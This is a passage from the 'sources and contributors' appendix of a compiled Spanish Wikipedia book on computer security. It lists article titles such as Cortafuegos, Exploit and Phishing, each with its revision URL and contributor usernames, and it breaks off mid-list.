Ciencias de la computación  Fuente: http://es.wikipedia.org/w/index.php?oldid=67423168  Contribuyentes: -jem-, 217-126-150-34.uc.nombres.ttd.es, Acratta, Agviquez86, AldanaN,Aledesanfer95, AlfonsoERomero, Andreasmperu, AndyVec, Antonorsi, Antón Francho, Apaz, Aquila ltda, Balderai, Brainup, Cedecomsa, Chester269, Chien, Cmonzonc, Comae, Cookie,Correogsk, Cratón, Cristianrock2, DIANA ALCANTARA, Damian cf, Davidzodelin, Death Master, Diegusjaimes, Djblack!, Dromero, EL Willy, Edc.Edc, Eduardosalg, Edulix, El loko,Emiduronte, Er Komandante, Ezarate, Farisori, Francisco2289, Furti, Greek, Greenbreen, HIPATIA2006, Helmy oved, Hidoy kukyo, Isha, JMCC1, Janus, Jarlaxle, Jefrcast, Jesuja,Jim88Argentina, Jkbw, Jose Aragon, Jstitch, Jtico, Juan.res, Kelden, Kn, Kulos, Kved, LMLM, Lapaxangacity, Lautaroo, Leonpolanco, Leugim1972, Mafores, ManuelGR, Marcoantoniothomas,Matdrodes, Maury11rock, Maveric149, McMalamute, Mdd, MercurioMT, Miguelo on the road, Muro de Aguas, Natalia Villarroel, Netito777, Ortisa, Paintman, Pedro Nonualco, Pinar, Poco apoco, Pólux, Rafael.heras, Rastrojo, Ravotm, Rodrigouf, RonaldoExtreme, Ruy Pugliesi, Rαge, Sabbut, Seasz, Sergio Andres Segovia, Slastic, Smileegar, Sosqartxa, SuperBraulio13, Surekilt,Tano4595, Taragui, Technopat, Thorongil, Tirithel, Trylks, UA31, Vitamine, Vubo, Walter closser, Xavier, Youssefsan, conversion script, Ál, 327 ediciones anónimas

Cortafuegos (informática)  Fuente: http://es.wikipedia.org/w/index.php?oldid=67444506  Contribuyentes: AchedDamiman, Airunp, Albertocalzones, Alejobd, Alexav8, Alhassam, Angus,Antonio Lopez, Antón Francho, Any Rand, Ascánder, Axvolution, Axxgreazz, Barcex, Barri, Bethan 182, Biasoli, Billinghurst, Bucephala, Caiser, Caos, Carlos Humberto, Ciencia Al Poder,Cobalttempest, Cookie, Correogsk, Cristianrock2, Cybermaniac, Danem, Dani vk2, Danilo Andres Ramirez, David.Villa, Deoxys 94, Dianai, Diegusjaimes, Digigalos, Dodo, Donpipo, Ecemaml,Edub, Er Komandante, Fernando Estel, Firewall, Fmariluis, Foundling, FrozenFlame, Gcsantiago, GermanX, Ginés90, Googolplanck, Hacko2, Halfdrag, Helmy oved, Hiperfelix, Humberto,Ingteleco, Internetsinacoso, Interwiki, Irbian, Ismagm, J. A. Gélvez, Jkbw, Jmvkrecords, Jondel, Jorge c2010, JorgeGG, Jotego, LMLM, LadyInGrey, Laura Fiorucci, Leiro & Law, Leonpolanco,Lourdes Cardenal, Lucien leGrey, Luispore, Malkavian, Mansoncc, ManuelGR, Manuelt15, Marco Regueira, Matdrodes, MatiasBellone, Mced, Miguelcorsi, Nachosan, Natrix, Niqueco, Ortisa,Osado, Paporrubio, PedroPrograma500, Platonides, Poco a poco, Pólux, Queninosta, Quiliro, Ralgis, Raulshc, Reinam, Roberpl, Rodri cyberdog, Roithamer, Rosita fraguel, Rubpe19,Ruiz-mazon, Santiperez, Sauron, Serolillo, SuperBraulio13, Superzerocool, Technopat, Tirithel, Tostadora, UA31, Valdega, Vbarahona, Veloma, Vivaelcelta, Welteroel, 444 ediciones anónimas

Bastion host  Fuente: http://es.wikipedia.org/w/index.php?oldid=67351521  Contribuyentes: Agus3985, Airunp, Alhassam, Biasoli, Gacpro, Gigaster, Grijander0, Ileana n, Jmvkrecords, LeszekJańczuk, Pablomdo, Rikaaii, Titigns, 16 ediciones anónimas

Lista de control de acceso  Fuente: http://es.wikipedia.org/w/index.php?oldid=64791179  Contribuyentes: Agox, Alhen unsafe, Angel GN, Camontuyu, Galaxy4, Hilmarz, Ignacioerrico,Jcaraballo, Jenix, Jkbw, JorgeGG, Manufernandez1985, Sebrev, Shooke, 37 ediciones anónimas

Firestarter  Fuente: http://es.wikipedia.org/w/index.php?oldid=64902504  Contribuyentes: ColdWind, Conspiranoico, Cristianrock2, GermanX, I gor ka, Itnas19, Matdrodes, Shooke, Strange55,6 ediciones anónimas

Unified Threat Management  Fuente: http://es.wikipedia.org/w/index.php?oldid=64678208  Contribuyentes: Agox, Arcibel, Benceno, Chvelez, Diego screech, Jmanel, Matdrodes, Raulshc,Savh, Sixstone, Urumi, Wikopedo, 2 ediciones anónimas

RFC 2979  Fuente: http://es.wikipedia.org/w/index.php?oldid=37396624  Contribuyentes: .Sergio, Barcex, Carlos Humberto, Correogsk, Flazcano, Hawking, Lobillo, PabloCastellano, Tomatejc,Yrithinnd

ZoneAlarm  Fuente: http://es.wikipedia.org/w/index.php?oldid=64830107  Contribuyentes: Arapajoe, Biasoli, Cristianrock2, LordT, Matdrodes, Patrias, SF007, SuperBraulio13, UA31, 24ediciones anónimas

Uncomplicated Firewall  Fuente: http://es.wikipedia.org/w/index.php?oldid=64676726  Contribuyentes: Alcoben25, Dangelin5, GermanX, Vespinoloco, 1 ediciones anónimas

Gufw  Fuente: http://es.wikipedia.org/w/index.php?oldid=65056765  Contribuyentes: Alcoben25, Asturix, Costales ast, Gaiterin, GermanX, Marquinos76, 6 ediciones anónimas

Ipfw  Fuente: http://es.wikipedia.org/w/index.php?oldid=64505097  Contribuyentes: D9, Wikisilki

PF (software)  Fuente: http://es.wikipedia.org/w/index.php?oldid=64833006  Contribuyentes: Alfredobi, Cristianrock2, DaDez, Leo priego, Szoltys1990, Yonderboy, 13 ediciones anónimas

Cracking (software)  Fuente: http://es.wikipedia.org/w/index.php?oldid=65101961  Contribuyentes: ARNT, Alakasam, Biasoli, ColdWind, Damianiencowiki, Kizar, Poco a poco, Sermed,Xvazquez

Crack informático  Fuente: http://es.wikipedia.org/w/index.php?oldid=67343129  Contribuyentes: -Erick-, Acerswap, AchedDamiman, Aleposta, Andreasmperu, Angelito7, Asd3000,Açipni-Lovrij, Beaire1, Biasoli, Canopus49, Canopus49Puppet, Cobalttempest, ColdWind, Comae, David0811, Diegusjaimes, ESTUDIANTE, Elabra sanchez, Elnegrojose, Fidelmoquegua,Hispa, Irbian, Jkbw, Jp25, Juanalmenara, LadyInGrey, Lauseker diego, Loro 2, Magister Mathematicae, Markoszarrate, Matdrodes, Menthalo, Mirkovich, Mortadelo2005, Nellofetek, Nioger,Obelix83, Petruss, Pólux, Racso, Sabbut, Sanbec, Seanver, TeleMania, Tirithel, Varano, Vitamine, Yakoo, 98 ediciones anónimas

Cracker  Fuente: http://es.wikipedia.org/w/index.php?oldid=67405567  Contribuyentes: Abdulicas, Abgenis, Aeris17, AlfonsoERomero, Alhen, Antur, Argenz, Axvolution, Beaire1, Beto29,BetoCG, Biasoli, BlackBeast, Blender, Brakdag, CF, Cal Jac02, Cally Berry, Camilo, Cangueblues, Carmin, Cinabrium, ColdWind, Compumaniaco, Cookie, D1d4c, Damer graves, Damifb,Dangarcia, David0811, Davidge, Deviance, Dianai, Diegusjaimes, Dodo, Dr Juzam, Dusan, Edub, ElenaJesusULE, Eli22, Elrandy28, Elwesley, Emijrp, Franciscomesa, FrancoGG,Globalphilosophy, Gloria Rozo Linares, Gonmator, Guanaco, Gusama Romero, Hephaestos, Hispa, Huhsunqu, Humbefa, Humberto, Ignacio Icke, Ileana n, Internetsinacoso, Irsek, JLPS,JMPerez, Jah, Javier De La Cueva, Jfsanchez, Jfwiki, Jkbw, Jomra, JorgeGG, Jorgebarrios, Jugones55, Kizar, KnightRider, Kriko318, Kved, LGI2, LadyInGrey, LarA, Laura Fiorucci,Leonpolanco, LordT, Losetodo666, MaeseLeon, Malejhacmcho, Manwë, MarcoAurelio, Matdrodes, Mel 23, Moriel, Muro de Aguas, Mxtintin, Máximo de Montemar, Mónica Cervantes,Nacionhacker, Nava0133, Netito777, Ni.cero, Nicoguaro, Nost, Nuen, Nº9, Opinador, Oscar ., Payasoandanteracista, Petronas, Platonides, Pólux, Quijav, Qwertyytrewqqwerty, RHB15, Racso,Ralgis, Rastrojo, Renly, Resped, RoyFocker, Rrupo, Rutrus, Sincos, Snakefang, Solution, SuperBraulio13, Superzerocool, Surfaz, Taichi, Tatvs, Tigerfenix, Tirithel, Tomatejc, Tornbag,Travelour, VanKleinen, Varano, Vic Fede, Wikxd, Yrithinnd, Zaca83, conversion script, eui4ca.euskaltel.es, Ál, 406 ediciones anónimas

Password cracking  Fuente: http://es.wikipedia.org/w/index.php?oldid=65268374  Contribuyentes: Alakasam, ColdWind, Damianiencowiki, Damifb, Death Master, Diegusjaimes, Ensada,Farisori, ILoveSugar, Jcrueda, LordT, Maudis, Vanbasten 23, Wilfreddehelm, 2 ediciones anónimas

Razor 1911  Fuente: http://es.wikipedia.org/w/index.php?oldid=64602732  Contribuyentes: ARNT, Angel GN, Biasoli, Hidoy kukyo, Kintaro, Kizar, Montgomery, Muro de Aguas, Nicoelmuta,Olivares86, Razer9911, Tasman, 72 ediciones anónimas

Desbordamiento de búfer  Fuente: http://es.wikipedia.org/w/index.php?oldid=65248524  Contribuyentes: AchedDamiman, Airunp, AstroNomo, BetoCG, Bryant1410, C'est moi, CharlieM,Dodo, Electrodan, Folkvanger, GermanX, Gmarinp, Ignacioerrico, Jfwiki, Macar, Marfedd, Miguel Pérez Francisco, Moleculax, Monty oso, Moriel, Opinador, Paintman, Profundo8, RGLago,Roberpl, Sageo, Shooke, Stitch, The worst user, Vanbasten 23, Waeswaes, Xandi, Zimio, 34 ediciones anónimas

Escáner de puertos  Fuente: http://es.wikipedia.org/w/index.php?oldid=64911543  Contribuyentes: Alexav8, Barri, Ciencia Al Poder, Geroldo, Marcejose, Mirok steel, Rcidte, 19 edicionesanónimas

Exploit  Fuente: http://es.wikipedia.org/w/index.php?oldid=66253589  Contribuyentes: Aalvarez12, Airunp, Alguien, Angus, Artistadelpecado, Byj2000, CF, Chet, Cucuruchooo, DLeandroc,Edub, Elabra sanchez, Fercufer, Fmdlc, Gabriel-3432, GermanX, Helmy oved, Jfwiki, Joseaperez, Leonardo, Lázaro, Macar, MadriCR, Mansoncc, Metrónomo, Montgomery, Moriel,Mpeinadopa, Mstreet linux, Nessa los, Nhpatt, Qwertyytrewqqwerty, Ralgis, Renik, Rsg, SPZ, SuperBraulio13, Vitamine, WalterNewsome, Wikipablo, conversion script, 91 ediciones anónimas

Seguridad informática  Fuente: http://es.wikipedia.org/w/index.php?oldid=67366141  Contribuyentes: -jem-, 333, AchedDamiman, Acorletti, Acratta, Adrruiz, Agox, Aikurn, Airunp,Alakasam, Alex299006, Alexav8, Alhen, Amadís, Andreasmperu, Angel GN, Antonorsi, Aosoriod, Arcibel, Asqueladd, Aziku, B3rN9, BL, Baiji, Banfield, Beesocialmx, Bernard, Bk26,BlackBeast, BrWriter2, Bucephala, CEVICAS, Cad, Cansado, Centroamericano, Ciencia Al Poder, Cinabrium, Cratón, Crisborghe, Curredsoc, Cxocommunity, Cybermeis, DJ Nietzsche,Damianiencowiki, Daniel121, Death Master, Deleatur, Demex, Diegusjaimes, Dodo, Draugmor, Eduardosalg, Edub, Edupedro, Egaida, Elabra sanchez, Emari, Emijrp, Er Komandante, Fixertool,Fran89, FrancoGG, Gabriel Acquistapace, Galandil, GermanX, Gerval, Giannii, Ginés90, Greek, Gustavodiazjaimes, H3dicho, H4l9k, HECTOR ARTURO AZUZ SANCHEZ, HUB, Halfdrag,Helmy oved, House, Hprmedina, Humberto, Héctor Guido Calvo, ILoveSugar, Iescriva, InfoAudit, Ing.armandolopez, Intecocert, Internetsinacoso, Inu, Irbian, Isha, Iulius1973, Ivanics,JEDIKNIGHT1970, JUANCARLOSMTZT, Javiergtz, Javierito92, Jihernandez, Jkbw, Jmquintas1973, Jmvkrecords, JoanCalderón, JorgeGG, Jramio, Jugones55, Jurgens, K-F.U.N 2, Kizar,Kordas, KrumVik, Laozmdq, Lejocum, Leugim1972, LlamaAl, Loco085, Lucien leGrey, Luis 414, Luis1970, M3thod.mdf, MIGUEL OJEDA, MadriCR, Magister Mathematicae, Magrox,Maleiva, Mansoncc, Manwë, MarcosJHofer, Matdrodes, McMalamute, Mecamático, Mel 23, Mjsoto, Montejo, Montgomery, Mortadelo2005, Mpeinadopa, Muro de Aguas, Mushii, NaSz,NathyMig, Nayeli.Inteli, Neburor, Netito777, Nicop, Nihilo, Nubecosmica, OMenda, OboeCrack, Omarngo, Osado, Oscar ., Oscarif, P kos, Palissy, Pan con queso, Pchamorro, Petruss, Pitlik,Platonides, Poco a poco, Pólux, Queninosta, Rafa2386, Ralgis, RamonVeres, Renly, Rennatot, Retama, Ricardo abarca, Ricardogpn, Rimac, Roberpl, Rodri cyberdog, Rodriguemus, Rogeliowar,Romel.rivas, Romz, RoyFocker, Rubpe19, Sanbec, Santi1212, Santiperez, Sarampión, Sausaf, Savh, Seanver, Seguridad informática, SergioN, Snakeyes, Soniautn, SuperBraulio13,Superzerocool, Tano4595, Technopat, Thr41N, Tigerfenix, Tirithel, Tomatejc, Tostadora, UA31, Uncorreotemporal, Urruedelp, Vanessaalexandra, Vitamine, Vituzzu, Waka Waka,WebResearcher!, Wilfredor, YaiElSa, Yeza, 897 ediciones anónimas

Page 144: Virus informático

Fuentes y contribuyentes del artículo 142

Inseguridad informática  Fuente: http://es.wikipedia.org/w/index.php?oldid=64494680  Contribuyentes: AchedDamiman, Dreitmen, Enrique Cordero, Enrique r25, Farisori, Hack txus,Jamoncitosrebosantes, KarlaGH, Machucho2007, Mastergunz, Miss Manzana, Ralgis, Shara Laila, Technopat, Vzquezdaniel, XalD, 21 ediciones anónimas

Desbordamiento de pila  Fuente: http://es.wikipedia.org/w/index.php?oldid=65568833  Contribuyentes: AchedDamiman, Farisori, Joseaperez, Superzerocool, Waeswaes, 5 ediciones anónimas

Desbordamiento de montículo  Fuente: http://es.wikipedia.org/w/index.php?oldid=66327640  Contribuyentes: AchedDamiman, Cookie, Farisori, Joseaperez, Superzerocool, Waeswaes, ÁngelLuis Alfaro, 1 ediciones anónimas

Shellcode  Fuente: http://es.wikipedia.org/w/index.php?oldid=64415526  Contribuyentes: Fmariluis, Fmdlc, GermanX, Guillerg, Javier Carro, Jfwiki, LyingB, Macar, Moriel, Paintman,Waeswaes, 11 ediciones anónimas

Error de software  Fuente: http://es.wikipedia.org/w/index.php?oldid=66159508  Contribuyentes: 4lex, AchedDamiman, Adept, Alfre204, Bark, CF, Carnendil, Comae, Cuate77, Diegusjaimes,Edub, ElVaka, Eldelgas, Feedehh, GermanX, Gmarinp, Hanjin, Helenio, Joaferna2008, Josemiguel93, Jugones55, Kuanto, LSonico2012, Lfgg2608, Linus, Markoszarrate, Matdrodes, Moriel,Neodraco, OMenda, Poco a poco, Quiron, Salvador85, Sauron, Sonett72, Stoni, Superzerocool, VR0, Vitamine, Waeswaes, Wilfreddehelm, Xqno, Yuri Grille Orce, Zyder, 66 ediciones anónimas

Hacker  Fuente: http://es.wikipedia.org/w/index.php?oldid=66764217  Contribuyentes: Alakasam, Alberto Elvira, AnselmiJuan, ArwinJ, Biasoli, Bloomy, Cristianuz12, Cybermaniac,Damianiencowiki, DayL6, Diegusjaimes, EdgarFabiano, El Pantera, FL0per, Fercufer, Gacpro, Gustronico, Hack txus, Humberto, Igna, Internetsinacoso, Isha, Isi viki, IvanStepaniuk,Jakeukalane, Javierito92, JoaquinFerrero, L0biz0n, Lustar, Malacitano, Mansoncc, NeftaliYagua, Nernix1, Olea, Omerta-ve, PabloCastellano, Resped, RubiksMaster110, Rαge, Sabbut, Surfaz,Tirithel, Tucto, Vitamine, Wilfredor, 105 ediciones anónimas

Melissa (informática)  Fuente: http://es.wikipedia.org/w/index.php?oldid=66516693  Contribuyentes: Alex Longclaw, EGFerreiro, Kizar, 4 ediciones anónimas

Analizador de paquetes  Fuente: http://es.wikipedia.org/w/index.php?oldid=64519272  Contribuyentes: Biasoli, Ciscoman, ColdWind, Cronos x, DDOc, Dany ule, Ejmeza, FAR, Feministo,Fitoschido, GermanX, Guillermolla, Ignacio Icke, JMPerez, Jfwiki, Jose David, Kimero, Lorenar13, Matdrodes, NaBUru38, Pilaf, Pilimex66, Porao, Readymade, SiMan, Taichi, Trebol6, 104ediciones anónimas

Phishing  Fuente: http://es.wikipedia.org/w/index.php?oldid=67441402  Contribuyentes: 32X, A ver, Aanggiiee, Acratta, Airunp, Alakasam, Aleja1994.17, Alejobd, Alexav8, Alextrevelian 006,Alvaro qc, Anita londoño, AnselmiJuan, Antur, Anvarstudios, Aofvilla, Asqueladd, Atila rey, Baiji, Barcex, Belgrano, Bogart NSSME, Bonilla daniel, Bryan alexander giraldo, Chuck es dios,Ciudadano77, Cmontero, ColdWind, Corrector1, Creosota, Crisborghe, Damianiencowiki, Damifb, Danniiela lopeez, David0811, Diana marcela correa, Diegusjaimes, Diotime, Dives, Dodo, Dr.Fasilier, Edison bolaños, Eduardosalg, Edupedro, Elisardojm, Emijrp, Ernesto Graf, FViolat, Filipo, GermanX, Ginés90, Gizmo II, Greek, Gusama Romero, Gusgus, Halfdrag, Helmy oved, Ialad,Ignacio Icke, Irm, Itz37, J. A. Gélvez, Jacorream, Jennixyta96, Jfwiki, Jkbw, Jkdd.laura, Jondel, Julianortega, Jynus, KErosEnE, Kakico, Kariime kaztro, Lady marin, Lasneyx, Laura Fiorucci,Leonpolanco, Lucien leGrey, MKernel, Magister Mathematicae, Mansoncc, Matdrodes, Matw13, Mazu castañeda, Melissa Savedra, Mortadelo2005, Mouse, Moylop260, Mpeinadopa,Muffinman, Nachosan, Olidata14, Pabloh, Paintman, Pedro Felipe, Pólux, Qwertyytrewqqwerty, RGLago, Richy, RubiksMaster110, Sabbut, Salesian Party, Saloca, Savh, Seanver, Sergio AndresSegovia, Shalbat, Sitatunga, Soro 04, SuperBraulio13, Superzerocool, Taichi, Technopat, Tirithel, UA31, Vandal Crusher, Wedrey, Wikiléptico, Zuirdj, 342 ediciones anónimas

Pharming  Fuente: http://es.wikipedia.org/w/index.php?oldid=67161584  Contribuyentes: Alexav8, Antonorsi, Antur, Ca3sar, ColdWind, Galaxiaad, GermanX, Gomex, Gramito, Ictlogist, J. A.Gélvez, Jatemanga, Jfwiki, JplULE, Kresp0, Libero, MarcoAurelio, Mariateresausuari uv, Matdrodes, Paintman, Pparistoy, Siabef, Tubet, 60 ediciones anónimas

Cross-site scripting  Fuente: http://es.wikipedia.org/w/index.php?oldid=64415763  Contribuyentes: ANELKAOS, Alexav8, ArbeloA, Billinghurst, Borja Sánchez, Corso, Cucuruchooo, Dodo, ErKomandante, ErKURITA, FeRmO, Federicotg, Folkvanger, FrancoGG, Futbolero, Gothmog, Iskhendar, Jfwiki, Jsanchezes, Jugones55, Jurgens, LPR, LordT, Luis junco, Macar, Maldoror,Marco Regueira, Matdrodes, MiDecadencia, Msalaslo, Nberger, NeguGorriak, Richy, Sabbut, Sirdarckcat, Spirit-Black-Wikipedista, Un Mercenario, Unf, Vanbasten 23, Vasiľ, WillyXoft,Xoneca, Youzwaz, Zuquirio, Ñuño Martínez, 154 ediciones anónimas

Spam  Fuente: http://es.wikipedia.org/w/index.php?oldid=67202496  Contribuyentes: 2rombos, 333, AchedDamiman, Agmichaca, Agox, Agrs700, Airunp, Akhram, Alakasam, Albireo3000,Alex299006, Alexav8, Alhen, Alvaro qc, Amadís, Andreasmperu, Angel GN, Antonio Peinado, Antur, Ascánder, Açipni-Lovrij, Baiji, Barcex, Barri, Biasoli, Bustar, Caligari, Camilo, Carutsu,Cayetano martí valls 3, Chlewey, Ciencia Al Poder, Comae, Cookie, Corydora, Cratón, DZPM, Dalton2, Damifb, Daniel CA, DanielithoMoya, Dark Bane, DarkQuinto, Darkblaz, David0811,Deleatur, Desatonao, Diegusjaimes, Dodo, Domitori, Douglassucre, Draxtreme, Eamezaga, Edslov, Eduardosalg, Edub, Edupedro, Eloysito, Elsonido, Emijrp, Ensada, Ente X, Epiovesan, Equi,Er Komandante, Eternoendless, Exploratorio, FAR, Farconeti, Farisori, FedericoMP, Flangana, Fonsi80, Franciscomesa, Frei sein, Gabriel Acquistapace, Gacq, Ganímedes, GermanX,Ggenellina, Gian Pierre Rodriguez, Ginés90, Greek, Grillado, Gusgus, Götz, HECTOR ARTURO AZUZ SANCHEZ, HUB, Hormigo, Humberto, IWRGokuUzumaki, Ialad, Icetta, Idleloop, Igna,Isha, Ivan.Romero, IvanIguaran, J. A. Gélvez, J.delanoy, JMB(es), JRIsP, Jaimito91, Jamj, Jarisleif, Javierito92, Jesusgay, Jjmerelo, Jjvaca, Jkbw, JoaquinFerrero, JorgeGG, Jorgemysterio,Joseaperez, Jsbadillo, Jugones55, Julian leonardo paez, Julianortega, Jynus, Kelv, Keres, Kernel panic, Kizar, Kulos, Kuskus, Kved, LMLM, LadyInGrey, Laura Fiorucci, Leonpolanco, Libero,LordT, Lospibes123, Lourdes Cardenal, MMPRrangers, MOSSO, MRK2001, Madalberta, Magister Mathematicae, Mahadeva, Maleiva, Malekov, Malkavian, Mansoncc, Manuel GonzálezOlaechea y Franco, Manuelt15, MarcoAurelio, Masti, Matdrodes, Maugemv, McMalamute, Mcat95, Mel 23, Melisavergamaso, Menudillossss, Mercenario97, Mick95, MiguelAngelCaballero,Minterior, Miss Manzana, Moriel, Mr. Moonlight, Muro de Aguas, Mykel Amelinckx, Mytwm, Nachosan, Nassiel, Nernix1, Netito777, Ninrouter, Noprescriptionneeded, Oblongo, Oddworld,Omarmota 88, Oscarpez, Pacovila, Paintman, Palica, Pauloat, Penarc, Pepelopex, Pepesoto, Pólux, Qac 3, Raas, Rastrojo, Ravave, Rgcamus, Ricardogpn, Rosarinagazo, Rosarino, Roveto,RoyFocker, Rαge, SUPUL SINAC, Sabbut, Sanbec, Santiperez, Savh, Seanver, Sergimv, Siabef, Snakeeater, Snakeyes, Stonificado, Superzerocool, Tamorlan, Tano4595, Tbhotch, Technopat,TeleMania, Tidsa, Tinchox, Tintinando, Tirithel, Tomatejc, Tostadora, Triku, Turkhero, Txuspe, Ufache, Varano, Veltys, Veon, Vic Fede, Vitamine, Vivaelcelta, Waka Waka, Wesisnay, Wfox,Wilmar500, XSquall, Xavigivax, Xavimetal, Xqno, Xsanity, Yanqui perdido, Yeza, Yodigo, Zeroth, 739 ediciones anónimas

Troyano (informática)  Fuente: http://es.wikipedia.org/w/index.php?oldid=67401407  Contribuyentes: 9javivi, Agox, Airunp, Alhen, Alvaro qc, AnselmiJuan, Açipni-Lovrij, Beto29, Biasoli,Bucephala, BuenaGente, CF, Camilo, Camima, Cardesan, Cesarlsanchez, Charly naa, Ciencia Al Poder, Cipión, ColdWind, CommonsDelinker, Copa99, Creosota, Daimond, DanielithoMoya,Death Master, Diegusjaimes, Dossier2, Dracoramone, Eduardosalg, Edub, Eli22, Elrudi, Emiduronte, Expectativa online, Farre12, Fran89, Franco-eisenhower, FrancoGG, Furrykef, Gafotas,GermanX, HECTOR ARTURO AZUZ SANCHEZ, HUB, Halfdrag, Helmy oved, Humberto, Ialad, Igna, Internetsinacoso, Invadinado, Iuliusfox, J. A. Gélvez, Jcaraballo, Jjvaca, Jkbw, Jorgec2010, Josemiguel93, Jvlivs, Kananas.ULE, Kirtash, Kizar, L'Américain, LMLM, Lasneyx, Laura Fiorucci, Leonpolanco, Mahadeva, Maleiva, Mansoncc, Manuribadeo, Marqmagneto,Matdrodes, Maugemv, Mel 23, Montgomery, Mriosriquelme, Nicop, Nioger, Oscar ., P.o.l.o., Paintman, Pambazo, Petruss, Platonides, Plumagay2, Ppja, Pólux, Queninosta, Ralgis, Retama,Rociomh, Rαge, Santiperez, Savh, Seba1548, Sebbysms, Snakeeater, SuperBraulio13, Surfaz, Tano4595, Teamdragons, Technopat, Tinchog87, Tonchizerodos, Tostadora, UA31, Veon,WikiPancho, WikiWiki1, ZrzlKing, ^ DeViL ^, 419 ediciones anónimas

War dialing  Fuente: http://es.wikipedia.org/w/index.php?oldid=64745501  Contribuyentes: GermanX, Mdiagom, Superzerocool, Xosema, 1 ediciones anónimas

Memoria de acceso aleatorio  Fuente: http://es.wikipedia.org/w/index.php?oldid=67304120  Contribuyentes: .José, 2009yac, 2rombos, Aadrover, Adriansm, Airunp, Alakasam, Alhen, Alitagm,Alonduro, Alvaro qc, Amadohc, Anetamp, Angel GN, Angus, Antur, Ascánder, Astonbreak, Açipni-Lovrij, Baiji, BeaKManiak, Bee Geesfan, Beto29, BetoCG, Biasoli, Bifus, BlackBeast, Bpk,Bryant1410, Camilo, Carlos Gregorio González, Carlosblh, Centeno, Cheveri, Chrihern, Cinabrium, CommonsDelinker, Cookie, Cousteau, Cristian Chávez Ramos, Crokett, DJ Nietzsche, Daaxe,Dangarcia, David0811, Davius, Death Master, Delphidius, Dibujon, Diego López, Diego bf109, Diegusjaimes, Diosa, Dnu72, Dodo, Dogor, Dondervogel 2, Dorieo, Dvdgmz, Dvelasquez, Dyon,ECAM, Edgemaster, Edisonbeta, Edslov, Eduardosalg, Edub, El duende alegre, Eli22, Elisardojm, Eloy, Eltumorestripado, Elwikipedista, Equi, Er Komandante, Esoya, Estoymuybueno,Ezarate73, FAR, Fcosegura, Felviper, Fergarci, Fieruky, Filipo, Filiprino, Folkvanger, Franeleven, Furti, Fvene002, FyLoX, Galio, GermanX, Goica, Goofys, Gothmog, Greek, Green182,Guillermoster, Gustavo.cuenca, Góngora, HUB, Haku, Halfdrag, Hari Seldon, Helmy oved, Hernanbarbosa, Hispa, Humberto, Icvav, Igna, Isha, Itnas19, JMPerez, JOKblogger, Jafeluv, Jafu53,Javierito92, Jcentel, Jdelrio, Jefferlds, Jkbw, Joanumbert, Joarobles, JojAGT, Jondel, Jorge 2701, JorgeGG, Joseaperez, Josell2, Jsanchezes, Jtico, Juandiegocano, Jugones55, Julio Cardmat,Kavira, Kekkyojin, Kexedo, Kismalac, Kordas, Kuronokoneko, Kved, Laura Fiorucci, Leonpolanco, Limo, Llfernandoll, Lobo, Locos epraix, Lourdes Cardenal, Lucasjk23, Lucien leGrey,Luigidakid, LuisArmandoRasteletti, MILTONPATO, Magister Mathematicae, Maldoror, Mansoncc, Manu Lop, Manuegonzalez, Manuel Trujillo Berges, Manwë, Maokoto, Marcecoro,MarcoAurelio, Matdrodes, Matiasasb, Maugemv, MeNtOrX, Mel 23, Miguel.lima, Miktam, Miss Manzana, Moriel, Mortadelo, Mortadelo2005, Mr. Benq, Muro de Aguas, Murphy era unoptimista, Museo8bits, Nelsolla, Netito777, Nicop, Niko guti2006, Nixón, Obelix83, OceanO, Ornitododo, Oscar ., Pabloab, Pablomdo, Pan con queso, Parras, PasajeRoverano, Patxi Aguado,Paz.ar, Pedro GarNic, Penesauro, Perquisitore, Phirosiberia, Pilaf, Platonides, Poco a poco, Ppja, Prietoquilmes, Pólux, Qwertyytrewqqwerty, Rabid Fish, Raf616, Rastrojo, Redmind007, Renly,Retama, Ricardogpn, Richy, Rickynoram, Rigenea, Roberpl, RoyFocker, RubiksMaster110, Rubpe19, STARPLAYER, SaeedVilla, Savh, Sebado, Sebrev, Sejorera, Shalbat, Shooke, Sms,Snakeyes, Soowly, Soulreaper, Sse4t4e, Stinger1, SuperBraulio13, Superchoto, Superzerocool, TArea, Taichi, Tano4595, Tantan1985, Taragui, Taty2007, Technopat, The worst user,Thunderbird2, Tico, Tolitose, Tomatejc, TorQue Astur, Tortillovsky, Triku, Truor, Txo, UA31, Unificacion, Uny, Varano, Vic Fede, Vitamine, Votinus, Víctor Antonio Torres Torres, Wilfredor,Will vm, Xqno, Yeza, Yio, Yrithinnd, Yubel, ZrzlKing, 1600 ediciones anónimas

Jerarquía de memoria  Fuente: http://es.wikipedia.org/w/index.php?oldid=67307453  Contribuyentes: !Silent, Ajqnjqli, Alexvisio, Biasoli, CommonsDelinker, Cr4DLe, Dianai, Diegusjaimes,GermanX, Isha, JMPerez, Josell2, Josue lmm, Juckar, Mandramas, MartinDM, Martincarr, Rubpe19, Solde9, Technopat, Tostadora, 20 ediciones anónimas

Controlador de memoria  Fuente: http://es.wikipedia.org/w/index.php?oldid=65064591  Contribuyentes: DJ Nietzsche, Enrique Cordero, TorQue Astur, 1 ediciones anónimas

Page 145: Virus informático

Fuentes y contribuyentes del artículo 143

Circuito integrado  Fuente: http://es.wikipedia.org/w/index.php?oldid=67108240  Contribuyentes: 3coma14, 4lex, Abajo estaba el pez, Airunp, Ale flashero, Alfonso Márquez, Amadís,Andreasmperu, Angel GN, Angietigger, Anoryat, Antonio Páramo, Antur, Antón Francho, Ascatzihualtl, Ascánder, AstroNomo, Açipni-Lovrij, Bambadee, Baute2010, Biasoli, Bifus, Bostok I,Bragina, Bucephala, Camilo, Centeno, Chrihern, Cinabrium, Claudio Elias, Ctrl Z, Dangelin5, DarkKapo, Diegusjaimes, Digigalos, Dodo, Dorieo, Dreitmen, Eamezaga, Edmenb, Eduardosalg,Edub, El mago de la Wiki, Emiduronte, Emijrp, Empikki, Enric Naval, Erfil, Escrotoletal, Esv23, Fel.mendo, Fernando Estel, Fitoschido, Foundling, FrancoGG, Gabriel Fernando Rosso R.,Galandil, Galenox, Gbloem1, Ginés90, Gorospe, Gothmog, Green182, Gsrdzl, Gusgus, HECTOR ARTURO AZUZ SANCHEZ, HUB, Halfdrag, Helmy oved, Humberto, Igna, Isha, JCeb,Javierito92, Jekter, Jkbw, Jorge c2010, Jorgelrm, Joryes, Joss87, Jozhuaa, Jsanchezes, Juancxo, Jugones55, Khiari, Klystrode, Komputisto, Kved, Laura Fiorucci, Leonpolanco, Libertad y Saber,LlamaAl, Lopezmts, Lotesse, Lucianinski, MRK2001, Mafores, Magister Mathematicae, Mahadeva, Maldoror, ManuelGR, Manwë, Marcelo Huerta, Mariooooo, Marvelshine, Matdrodes,Melocoton, Mendezmh, 